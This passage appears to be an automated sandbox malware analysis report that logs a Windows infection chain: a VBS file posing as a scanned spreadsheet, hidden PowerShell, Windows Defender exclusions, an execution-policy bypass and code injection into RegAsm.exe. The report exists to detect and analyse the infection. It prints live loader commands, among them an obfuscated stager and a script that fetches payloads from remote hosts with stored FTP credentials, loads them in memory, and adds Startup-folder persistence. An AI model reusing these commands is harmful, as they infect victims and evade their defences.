                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1717Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1472Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3910Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5930Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8061Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1430Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8162Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1389Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3620Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 5011
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4502
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1740
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1203
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.1 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep count: 3910 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep count: 5930 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 8061 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1128Thread sleep count: 1430 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep count: 8162 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep count: 1389 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1584Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420Thread sleep count: 3620 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 286 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep count: 928 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep count: 194 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5192Thread sleep count: 132 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5192Thread sleep time: -66000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112Thread sleep count: 5011 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112Thread sleep time: -15033000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112Thread sleep count: 4502 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112Thread sleep time: -13506000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep count: 1203 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 876Thread sleep count: 1022 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep count: 102 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: powershell.exe, 00000004.00000002.3091395581.000001BDC851B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: powershell.exe, 0000000D.00000002.2786504966.000001EB6578E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00443355 mov eax, dword ptr fs:[00000030h]20_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004120B2 GetProcessHeap,HeapFree,20_2_004120B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00434BD8 SetUnhandledExceptionFilter,20_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi64_6764.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C29008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BE6008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 608008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe20_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00419662 mouse_event,20_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
